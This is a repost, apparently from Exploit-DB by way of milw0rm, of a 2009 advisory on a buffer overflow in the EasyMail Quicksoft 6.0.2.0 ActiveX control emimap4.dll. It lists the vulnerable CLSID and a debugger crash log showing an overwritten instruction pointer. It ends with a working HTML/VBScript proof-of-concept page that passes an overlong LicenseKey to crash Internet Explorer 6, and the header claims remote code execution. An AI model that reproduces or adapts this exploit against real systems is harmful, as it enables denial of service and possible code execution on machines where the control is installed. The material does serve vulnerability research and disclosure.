- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9684
- Проверка EDB
-
- Пройдено
- Автор
- FRANCIS PROVENCHER
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- null
- Дата публикации
- 2009-09-15
Код:
#####################################################################################
Application: EasyMail Quicksoft 6.0.2.0
Platforms: Windows XP Professional French SP2
crash: IE 6.0.2900.2180
Exploitation: remote Code Execution
Date: 2009-08-24
Author: Francis Provencher (Protek Research Lab's)
#####################################################################################
1) Introduction
2) Technical details and bug
3) The Code
#####################################################################################
===============
1) Introduction
===============
Create, send, download, parse, print and store internet email messages in your classic windows application. Designed for Visual Basic, ASP, C++, Delphi, ColdFusion, PowerBuilder, Access and other development environments. COM or standard DLL interfaces. This is the software that processes hundreds of millions of email messages on the Internet every day.
#####################################################################################
============================
2) Technical details
============================
Name: emimap4.dll
Ver.: 6.0.2.0
CLSID: {0CEA3FB1-7F88-4803-AA8E-AD021566955D}
ModLoad: 037f0000 0381e000 C:\WINDOWS\system32\emimap4.dll
(2088.2388): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0380c878 ecx=0012df70 edx=00000039 esi=0033df18 edi=0033e14c
eip=41414141 esp=0012df88 ebp=41414141 iopl=0 nv up ei pl zr na pe nc
#####################################################################################
===========
3) The Code
===========
Proof of concept DoS code;
<HTML>
<object classid='clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D' id='target'></object>
<script language = 'vbscript'>
Scrap = unescape("http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
code = Scrap
target.LicenseKey = code
</script>
<html>
~
#####################################################################################
# milw0rm.com [2009-09-15]- Источник
- www.exploit-db.com
